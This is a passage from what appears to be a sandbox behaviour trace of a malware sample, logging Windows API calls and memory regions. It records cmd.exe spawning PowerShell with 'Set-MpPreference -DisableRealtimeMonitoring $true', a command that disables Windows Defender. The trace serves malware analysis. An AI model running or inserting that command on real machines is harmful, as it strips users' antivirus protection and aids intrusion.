lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.941] GetLastError () returned 0x2 [0105.941] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.942] GetLastError () returned 0x2 [0105.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.942] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0x3a2270 [0105.942] FindClose (in: hFindFile=0x3a2270 | out: hFindFile=0x3a2270) returned 1 [0105.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0xffffffff [0105.944] GetLastError () returned 0x2 [0105.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef10c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef10c) returned 0x3a2270 [0105.944] FindClose (in: hFindFile=0x3a2270 | out: hFindFile=0x3a2270) returned 1 [0105.945] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.945] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.945] GetConsoleTitleW (in: lpConsoleTitle=0x1ef604, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.945] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef48c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef554 | out: lpAttributeList=0x1ef48c, lpSize=0x1ef554) returned 1 [0105.945] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef48c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef54c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef48c, lpPreviousValue=0x0) returned 1 [0105.945] GetStartupInfoW (in: lpStartupInfo=0x1ef448 | out: lpStartupInfo=0x1ef448*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0105.945] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="Path=%S", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.946] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.946] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.947] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef4e8*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef534 | out: lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x1ef534*(hProcess=0x78, hThread=0x74, dwProcessId=0x320, dwThreadId=0x114)) returned 1 [0105.980] CloseHandle (hObject=0x74) returned 1 [0105.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0105.980] GetEnvironmentStringsW () returned 0x3a49f0* [0105.980] FreeEnvironmentStringsW (penv=0x3a49f0) returned 1 [0105.980] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0153.827] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1ef428 | out: lpExitCode=0x1ef428*=0x1) returned 1 [0153.828] CloseHandle (hObject=0x78) returned 1 [0153.828] _vsnwprintf (in: _Buffer=0x1ef570, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef434 | out: _Buffer="00000001") returned 8 [0153.828] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0153.828] GetEnvironmentStringsW () returned 0x3a23f0* [0153.828] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0153.828] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0153.828] GetEnvironmentStringsW () returned 0x3a23f0* [0153.828] FreeEnvironmentStringsW (penv=0x3a23f0) returned 1 [0153.828] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef48c | out: lpAttributeList=0x1ef48c) [0153.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0153.829] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.829] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0153.829] SetConsoleInputExeNameW () returned 0x1 [0153.829] GetConsoleOutputCP () returned 0x1b5 [0153.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0153.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.829] exit (_Code=1) Process: id = "9" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x3f813000" os_pid = "0x320" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x900" cmd_line = "powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1627 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1629 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1630 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1631 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1632 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1633 start_va = 0x221c0000 end_va = 0x22231fff entry_point = 0x221c0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 1634 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1635 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1636 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1637 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1638 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1639 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1640 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1641 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1642 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1643 start_va = 0x140000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1644 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1645 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1646 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1733 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1734 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1735 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1736 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1737 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1738 start_va = 0x74da0000 end_va = 0x74de9fff entry_point = 0x74da0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 1739 start_va = 0x75220000 end_va = 0x75233fff entry_point = 0x75220000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 1740 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1741 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1742 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1743 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1744 start_va = 0x75540000 end_va = 0x755cefff entry_point = 0x75540000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1745 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1746 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1747 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1748 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1749 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1750 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1751 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1752 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1753 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1754 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1755 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1756 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1757 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1758 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1759 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1760 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1761 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1762 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1763 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1764 start_va = 0x130000 end_va = 0x132fff entry_point = 0x130000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 1765 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1766 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1767 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1768 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1769 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 1770 start_va = 0x1d80000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1771 start_va = 0x1f50000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1772 start_va = 0x75050000 end_va = 0x750cffff entry_point = 0x75050000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1773 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1774 start_va = 0x1dc0000 end_va = 0x1e9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dc0000" filename = "" Region: id = 1775 start_va = 0x764b0000 end_va = 0x76532fff entry_point = 0x764b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1776 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1777 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1778 start_va = 0x74d70000 end_va = 0x74d7afff entry_point = 0x74d70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1779 start_va = 0x74d80000 end_va = 0x74d96fff entry_point = 0x74d80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1780 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1781 start_va = 0x74bd0000 end_va = 0x74d6dfff entry_point = 0x74bd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1782 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1783 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1784 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1785 start_va = 0x1d20000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1786 start_va = 0x1f90000 end_va = 0x225efff entry_point = 0x1f90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1787 start_va = 0x75520000 end_va = 0x75531fff entry_point = 0x75520000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1788 start_va = 0x75d70000 end_va = 0x75f0cfff entry_point = 0x75d70000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1789 start_va = 0x762c0000 end_va = 0x762e6fff entry_point = 0x762c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1790 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1791 start_va = 0x2260000 end_va = 0x2652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 1792 start_va = 0x74ab0000 end_va = 0x74ba4fff entry_point = 0x74ab0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1793 start_va = 0x74a80000 end_va = 0x74aa0fff entry_point = 0x74a80000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1794 start_va = 0x75b10000 end_va = 0x75b54fff entry_point = 0x75b10000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1796 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x280000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 1797 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1798 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1799 start_va = 0x1ed0000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1800 start_va = 0x2660000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 1801 start_va = 0x74a30000 end_va = 0x74a7bfff entry_point = 0x74a30000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1802 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1803 start_va = 0x74a00000 end_va = 0x74a2dfff entry_point = 0x74a00000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 1816 start_va = 0x749a0000 end_va = 0x749a8fff entry_point = 0x749a0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 1871 start_va = 0x270000 end_va = 0x273fff entry_point = 0x270000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1872 start_va = 